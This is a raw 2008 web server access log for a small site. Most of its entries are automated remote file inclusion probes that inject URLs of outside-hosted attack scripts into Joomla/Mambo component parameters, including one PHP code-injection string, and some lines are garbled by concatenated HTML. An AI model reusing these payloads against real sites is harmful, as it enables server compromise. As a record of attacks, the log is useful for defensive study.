69.89.25.171 - - [25/May/2008:09:24:12 -0700] "GET /[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:24:14 -0700] "GET /logs/access_080215.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
67.15.48.60 - - [25/May/2008:09:24:14 -0700] "GET /logs/access_080215.log/errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.79.246.200 - - [25/May/2008:09:24:53 -0700] "GET /logs/access_080301.log%3C/span%3E%20-%20%3Cem%3E527k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.freeconservatives.com/vb/archive/index.php/t-48973.html%22%20%3ENorth%20American%20Union%20is%20REAL%20[Archive]%20-%20FreeConservatives%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20be%20presented%20to%20the%20governments%20of%20all%20three%20nations%20in%20September%20of%20this%20year%20at:%20...%20http:/www.keeptexasmoving.com/index.php/trans-texas_corridor%20...%3C/div%3E%3Cspan%20class=url%3Ewww.freeconservatives.com/vb/archive/index.php/t-48973.html%3C/span%3E%20-%20%3Cem%3E89k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r3%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/images.metacca.com/search/dustylydia/us5:83.99.90.77.79.246.200 - - [25/May/2008:09:24:53 -0700] "GET /logs/access_080301.log%3C/span%3E%20-%20%3Cem%3E527k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.freeconservatives.com/vb/archive/index.php/t-48973.html%22%20%3ENorth%20American%20Union%20is%20REAL%20[Archive]%20-%20FreeConservatives%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20be%20presented%20to%20the%20governments%20of%20all%20three%20nations%20in%20September%20of%20this%20year%20at:%20...%20http:/www.keeptexasmoving.com/index.php/trans-texas_corridor%20...%3C/div%3E%3Cspan%20class=url%3Ewww.freeconservatives.com/vb/archive/index.php/t-48973.html%3C/span%3E%20-%20%3Cem%3E89k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r3%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/images.metacca.com/search/readfairytales/us1:190.177.79.246.200 - - [25/May/2008:09:24:54 -0700] "GET //trans/trans.php?trans=&page=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.79.246.200 - - [25/May/2008:09:24:54 -0700] "GET /errors.php?error=http://hotel682.server4you.de/skins/mskin_19/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
77.79.246.200 - - [25/May/2008:09:24:55 -0700] "GET /logs/access_080301.log%3C/span%3E%20-%20%3Cem%3E527k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.freeconservatives.com/vb/archive/index.php/t-48973.html%22%20%3ENorth%20American%20Union%20is%20REAL%20[Archive]%20-%20FreeConservatives%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20be%20presented%20to%20the%20governments%20of%20all%20three%20nations%20in%20September%20of%20this%20year%20at:%20...%20http:/www.keeptexasmoving.com/index.php/trans-texas_corridor%20...%3C/div%3E%3Cspan%20class=url%3Ewww.freeconservatives.com/vb/archive/index.php/t-48973.html%3C/span%3E%20-%20%3Cem%3E89k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r3%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/images.metacca.com/search/martinbrant2000/us1:70.177.79.246.200 - - [25/May/2008:09:24:56 -0700] "GET /logs/access_080301.log%3C/span%3E%20-%20%3Cem%3E527k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r2%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/www.freeconservatives.com/vb/archive/index.php/t-48973.html%22%20%3ENorth%20American%20Union%20is%20REAL%20[Archive]%20-%20FreeConservatives%3C/a%3E%3C/h3%3E%3C/div%3E%3Cdiv%20class=%22abstr%22%3E...%20be%20presented%20to%20the%20governments%20of%20all%20three%20nations%20in%20September%20of%20this%20year%20at:%20...%20http:/www.keeptexasmoving.com/index.php/trans-texas_corridor%20...%3C/div%3E%3Cspan%20class=url%3Ewww.freeconservatives.com/vb/archive/index.php/t-48973.html%3C/span%3E%20-%20%3Cem%3E89k%3C/em%3E%3C/div%3E%3C/div%3E%3C/li%3E%3Cli%20id=%22r3%22%3E%3Cdiv%20class=%22res-p%22%3E%3Cdiv%20class=%22res%22%3E%3Cdiv%3E%3Ch3%3E%3Ca%20class=%22yschttl%22%20href=%22http:/images.metacca.com/search/lingeriestoreusa/us2:64.189.140.12.250 - - [25/May/2008:09:24:56 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.32.233 - - [25/May/2008:09:24:56 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:24:56 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.32.233 - - [25/May/2008:09:24:57 -0700] "GET /logs//component/option,com_sitemap/Itemid,92/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:25:30 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:25:31 -0700] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.149.231.145 - - [25/May/2008:09:25:37 -0700] "GET /logs/access_080120.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:09:25:53 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:09:25:53 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
128.46.156.155 - - [25/May/2008:09:25:53 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:26:11 -0700] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:26:11 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:26:27 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:26:28 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:26:28 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.67.119 - - [25/May/2008:09:26:34 -0700] "GET /logs//main.php?sayfa=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [25/May/2008:09:26:34 -0700] "GET //main.php?sayfa=http://splitta.altervista.org/php5/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:09:26:54 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.b470-killer.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
201.12.151.34 - - [25/May/2008:09:26:54 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.b470-killer.kit.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:26:57 -0700] "GET /logs/access_080223.log/index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:27:01 -0700] "GET /index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:27:01 -0700] "GET /logs/index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:27:58 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:27:59 -0700] "GET /index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:27:59 -0700] "GET /logs/index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.154.167.15 - - [25/May/2008:09:28:09 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.freewebs.com/ascnet/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:28:49 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:28:50 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:28:50 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.89.22.139 - - [25/May/2008:09:28:56 -0700] "GET /logs/access_080225.log/index.php?body=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:29:06 -0700] "GET /logs/access_080215.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:29:06 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:29:06 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:29:20 -0700] "GET /logs/[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:29:20 -0700] "GET /[Scripthttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:29:25 -0700] "GET /logs/access_080212.log/index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:29:26 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:29:26 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:29:44 -0700] "GET /logs/access.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:29:46 -0700] "GET /logs/access.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:29:46 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [25/May/2008:09:29:47 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
161.58.178.229 - - [25/May/2008:09:30:06 -0700] "GET /logs/access.log/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:30:44 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:30:45 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:30:55 -0700] "GET /logs/index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:30:55 -0700] "GET /logs//common/db.php?commonpath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:30:56 -0700] "GET //common/db.php?commonpath=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:30:56 -0700] "GET /index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:32:18 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:32:19 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:32:19 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.18.229 - - [25/May/2008:09:32:21 -0700] "GET /megumi/Necklace/?M=A HTTP/1.0" 200 4307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.36.242.224 - - [25/May/2008:09:32:39 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.36.242.224 - - [25/May/2008:09:32:39 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.36.242.224 - - [25/May/2008:09:32:39 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:32:44 -0700] "GET /logs/errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.77.209.226 - - [25/May/2008:09:32:45 -0700] "GET /errors.php?error=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [25/May/2008:09:32:55 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [25/May/2008:09:32:56 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [25/May/2008:09:32:56 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:32:58 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:32:58 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:32:58 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.53.226 - - [25/May/2008:09:33:01 -0700] "GET /index.php?sourcedir=http://www.faitesdelamusique.fr/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:33:03 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:33:03 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.64.51.3 - - [25/May/2008:09:33:03 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:33:17 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:33:17 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:33:17 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:33:30 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:33:31 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.104.144.28 - - [25/May/2008:09:33:31 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:33:31 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:33:32 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.77.9.141 - - [25/May/2008:09:33:32 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.geocities.com/matrix.cyber90/data.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.12.244.192 - - [25/May/2008:09:33:53 -0700] "GET /logs/access_080225.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [25/May/2008:09:33:53 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.12.244.192 - - [25/May/2008:09:33:53 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:34:00 -0700] "GET /logs/scanhttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:34:00 -0700] "GET /scanhttp://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [25/May/2008:09:34:13 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vivace.biz/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [25/May/2008:09:34:14 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vivace.biz/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.16.148.38 - - [25/May/2008:09:34:14 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://vivace.biz/t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:34:25 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [25/May/2008:09:34:33 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [25/May/2008:09:34:34 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:34:35 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:34:35 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.140.12.250 - - [25/May/2008:09:34:35 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cricketsecrets.com/RSS2B/settings/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.242.224 - - [25/May/2008:09:34:45 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.120.198 - - [25/May/2008:09:34:59 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:35:01 -0700] "GET /logs/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.101 - - [25/May/2008:09:35:02 -0700] "GET /index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.36.242.224 - - [25/May/2008:09:35:04 -0700] "GET /logs/access_080131.log/index2.php?x=http://kayris.globalservers.com/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:35:11 -0700] "GET /logs/access_071218.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:35:11 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.134.253.108 - - [25/May/2008:09:35:11 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.myarquivos.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
76.12.32.214 - - [25/May/2008:09:35:38 -0700] "GET /logs//?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.19yo.de/images/stories/fruit/wy.txt?? HTTP/1.1" 200 48991 "-" "libwww-perl/5.79" "www.dmulk.com"
